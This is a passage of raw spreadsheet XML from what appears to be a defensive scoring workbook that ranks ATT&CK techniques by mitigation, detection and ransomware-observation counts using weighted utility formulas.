        <f>IF(AL543="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN543" s="52">
        <v>0</v>
      </c>
      <c r="AO543" s="51">
        <v>0</v>
      </c>
      <c r="AP543" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="AQ543" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AR543" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AS543" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT543" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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44" spans="1:47">
      <c r="A544" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="B544" s="25">
        <f>SUM(H544,M544,V544)*(1+SUM(AE544,AG544,AI544,AK544,AM544))</f>
        <v>5.6600000000000011E-2</v>
      </c>
      <c r="C544" s="25" t="s">
        <v>1901</v>
      </c>
      <c r="D544" s="25" t="s">
        <v>1900</v>
      </c>
      <c r="E544" s="25" t="s">
        <v>1902</v>
      </c>
      <c r="F544" s="51">
        <v>0</v>
      </c>
      <c r="G544" s="51">
        <v>1</v>
      </c>
      <c r="H544" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I544">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J544">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K544">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L544">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M544" s="25">
        <v>0</v>
      </c>
      <c r="N544" s="51">
        <v>0</v>
      </c>
      <c r="O544" s="51">
        <v>0</v>
      </c>
      <c r="P544" s="51">
        <v>0</v>
      </c>
      <c r="Q544" s="51">
        <v>0</v>
      </c>
      <c r="R544" s="51"/>
      <c r="S544" s="51">
        <v>0</v>
      </c>
      <c r="T544" s="51"/>
      <c r="U544" s="51">
        <v>0</v>
      </c>
      <c r="V544" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W544">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X544">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y544">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z544">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA544">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB544">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC544" s="29" t="s">
        <v>1469</v>
      </c>
      <c r="AD544" s="25" t="str" cm="1">
        <f t="array" ref="AD544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC544)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE544" s="25">
        <f>IF(AD544="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF544" s="25" t="str" cm="1">
        <f t="array" ref="AF544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC544)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG544" s="25">
        <f>IF(AF544="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH544" s="25" t="str" cm="1">
        <f t="array" ref="AH544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC544)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI544" s="25">
        <f>IF(AH544="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ544" s="25" t="str" cm="1">
        <f t="array" ref="AJ544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC544)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK544" s="25">
        <f>IF(AJ544="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL544" s="25" t="str" cm="1">
        <f t="array" ref="AL544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC544)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM544" s="25">
        <f>IF(AL544="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN544" s="60">
        <v>0</v>
      </c>
      <c r="AO544" s="51">
        <v>0</v>
      </c>
      <c r="AP544" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="AQ544" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AR544" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AS544" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT544" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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45" spans="1:47">
      <c r="A545" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="B545" s="25">
        <f>SUM(H545,M545,V545)*(1+SUM(AE545,AG545,AI545,AK545,AM545))</f>
        <v>5.6600000000000011E-2</v>
      </c>
      <c r="C545" s="25" t="s">
        <v>1903</v>
      </c>
      <c r="D545" s="25" t="s">
        <v>1900</v>
      </c>
      <c r="E545" s="25" t="s">
        <v>1904</v>
      </c>
      <c r="F545" s="51">
        <v>0</v>
      </c>
      <c r="G545" s="51">
        <v>1</v>
      </c>
      <c r="H545" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I545">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J545">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K545">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L545">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M545" s="25">
        <v>0</v>
      </c>
      <c r="N545" s="51">
        <v>0</v>
      </c>
      <c r="O545" s="51">
        <v>0</v>
      </c>
      <c r="P545" s="51">
        <v>0</v>
      </c>
      <c r="Q545" s="51">
        <v>0</v>
      </c>
      <c r="R545" s="51"/>
      <c r="S545" s="51">
        <v>0</v>
      </c>
      <c r="T545" s="51"/>
      <c r="U545" s="51">
        <v>0</v>
      </c>
      <c r="V545" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W545">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X545">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y545">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z545">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA545">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB545">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC545" s="29" t="s">
        <v>1469</v>
      </c>
      <c r="AD545" s="25" t="str" cm="1">
        <f t="array" ref="AD545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC545)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE545" s="25">
        <f>IF(AD545="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF545" s="25" t="str" cm="1">
        <f t="array" ref="AF545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC545)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG545" s="25">
        <f>IF(AF545="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH545" s="25" t="str" cm="1">
        <f t="array" ref="AH545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC545)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI545" s="25">
        <f>IF(AH545="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ545" s="25" t="str" cm="1">
        <f t="array" ref="AJ545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC545)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK545" s="25">
        <f>IF(AJ545="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL545" s="25" t="str" cm="1">
        <f t="array" ref="AL545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC545)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM545" s="25">
        <f>IF(AL545="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN545" s="52">
        <v>0</v>
      </c>
      <c r="AO545" s="51">
        <v>0</v>
      </c>
      <c r="AP545" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="AQ545" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AR545" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AS545" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT545" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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46" spans="1:47" ht="48">
      <c r="A546" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6500000000000005E-3</v>
      </c>
      <c r="B546" s="25">
        <f>SUM(H546,M546,V546)*(1+SUM(AE546,AG546,AI546,AK546,AM546))</f>
        <v>6.6500000000000004E-2</v>
      </c>
      <c r="C546" s="25" t="s">
        <v>1905</v>
      </c>
      <c r="D546" s="25" t="s">
        <v>1891</v>
      </c>
      <c r="E546" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F546" s="51">
        <v>0</v>
      </c>
      <c r="G546" s="51">
        <v>1</v>
      </c>
      <c r="H546" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I546">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J546">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K546">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L546">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M546" s="25">
        <v>0</v>
      </c>
      <c r="N546" s="51">
        <v>0</v>
      </c>
      <c r="O546" s="51">
        <v>0</v>
      </c>
      <c r="P546" s="51">
        <v>0</v>
      </c>
      <c r="Q546" s="51">
        <v>0</v>
      </c>
      <c r="R546" s="51"/>
      <c r="S546" s="51">
        <v>0</v>
      </c>
      <c r="T546" s="51"/>
      <c r="U546" s="51">
        <v>0</v>
      </c>
      <c r="V546" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W546">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X546">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y546">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z546">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA546">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB546">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC546" s="29" t="s">
        <v>229</v>
      </c>
      <c r="AD546" s="25" t="str" cm="1">
        <f t="array" ref="AD546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC546)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE546" s="25">
        <f>IF(AD546="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF546" s="25" t="str" cm="1">
        <f t="array" ref="AF546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC546)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG546" s="25">
        <f>IF(AF546="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH546" s="25" t="str" cm="1">
        <f t="array" ref="AH546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC546)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI546" s="25">
        <f>IF(AH546="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ546" s="25" t="str" cm="1">
        <f t="array" ref="AJ546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC546)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK546" s="25">
        <f>IF(AJ546="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL546" s="25" t="str" cm="1">
        <f t="array" ref="AL546">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC546)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM546" s="25">
        <f>IF(AL546="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN546" s="64">
        <v>0</v>
      </c>
      <c r="AO546" s="51"/>
      <c r="AP546" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6500000000000005E-3</v>
      </c>
      <c r="AQ546" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.2166666666666668E-2</v>
      </c>
      <c r="AR546" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.2166666666666668E-2</v>
      </c>
      <c r="AS546" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT546" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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47" spans="1:47" ht="32.1">
      <c r="A547" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9899999999999997E-3</v>
      </c>
      <c r="B547" s="25">
        <f>SUM(H547,M547,V547)*(1+SUM(AE547,AG547,AI547,AK547,AM547))</f>
        <v>5.9900000000000002E-2</v>
      </c>
      <c r="C547" s="25" t="s">
        <v>1906</v>
      </c>
      <c r="D547" s="25" t="s">
        <v>1891</v>
      </c>
      <c r="E547" s="25" t="s">
        <v>1907</v>
      </c>
      <c r="F547" s="51">
        <v>0</v>
      </c>
      <c r="G547" s="51">
        <v>1</v>
      </c>
      <c r="H547" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I547">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J547">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K547">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L547">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M547" s="25">
        <v>0</v>
      </c>
      <c r="N547" s="51">
        <v>0</v>
      </c>
      <c r="O547" s="51">
        <v>0</v>
      </c>
      <c r="P547" s="51">
        <v>0</v>
      </c>
      <c r="Q547" s="51">
        <v>0</v>
      </c>
      <c r="R547" s="51"/>
      <c r="S547" s="51">
        <v>0</v>
      </c>
      <c r="T547" s="51"/>
      <c r="U547" s="51">
        <v>0</v>
      </c>
      <c r="V547" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W547">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X547">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y547">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z547">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA547">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB547">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC547" s="29" t="s">
        <v>1908</v>
      </c>
      <c r="AD547" s="25" t="str" cm="1">
        <f t="array" ref="AD547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC547)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE547" s="25">
        <f>IF(AD547="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF547" s="25" t="str" cm="1">
        <f t="array" ref="AF547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC547)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG547" s="25">
        <f>IF(AF547="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH547" s="25" t="str" cm="1">
        <f t="array" ref="AH547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC547)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI547" s="25">
        <f>IF(AH547="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ547" s="25" t="str" cm="1">
        <f t="array" ref="AJ547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC547)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK547" s="25">
        <f>IF(AJ547="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL547" s="25" t="str" cm="1">
        <f t="array" ref="AL547">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC547)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM547" s="25">
        <f>IF(AL547="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN547" s="64">
        <v>0</v>
      </c>
      <c r="AO547" s="51"/>
      <c r="AP547" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9899999999999997E-3</v>
      </c>
      <c r="AQ547" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.9966666666666667E-2</v>
      </c>
      <c r="AR547" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.9966666666666667E-2</v>
      </c>
      <c r="AS547" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT547" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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48" spans="1:47" ht="32.1">
      <c r="A548" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B548" s="25">
        <f>SUM(H548,M548,V548)*(1+SUM(AE548,AG548,AI548,AK548,AM548))</f>
        <v>0.05</v>
      </c>
      <c r="C548" s="25" t="s">
        <v>1909</v>
      </c>
      <c r="D548" s="25" t="s">
        <v>1870</v>
      </c>
      <c r="E548" s="25" t="s">
        <v>1910</v>
      </c>
      <c r="F548" s="51">
        <v>0</v>
      </c>
      <c r="G548" s="51">
        <v>1</v>
      </c>
      <c r="H548" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I548">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J548">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K548">
